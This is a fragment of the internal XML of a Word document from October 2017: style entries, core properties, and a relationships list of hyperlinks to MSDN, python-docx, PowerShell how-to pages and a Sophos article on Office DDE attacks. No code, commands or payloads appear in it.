    <w:rsid w:val="00F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1D1D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{852EED7B-E6A5-4333-9A1A-4526CABE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0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6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0F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3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DefaultParagraphFont"/>
    <w:rsid w:val="00E673C7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="o">
    <w:name w:val="o"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00E6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sdn.microsoft.com/en-us/library/ff531181(v=office.12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ython-openxml/python-docx/issues/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wertheshell.com/bp_noprofi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ndowsnotes.ru/powershell-2/zapusk-programmy-iz-powershe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kedsecurity.sophos.com/2017/10/22/office-dde-attack-works-in-outlook-too-heres-what-to-do/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://python-docx.readthedocs.io/en/lates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sdn.microsoft.com/en-us/library/windows/desktop/ms648774(v=vs.85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E6B1-6D06-43CC-8683-3ED79009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f</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>beaf</cp:lastModifiedBy>
  <cp:revision>55</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-23T15:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-24T00:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>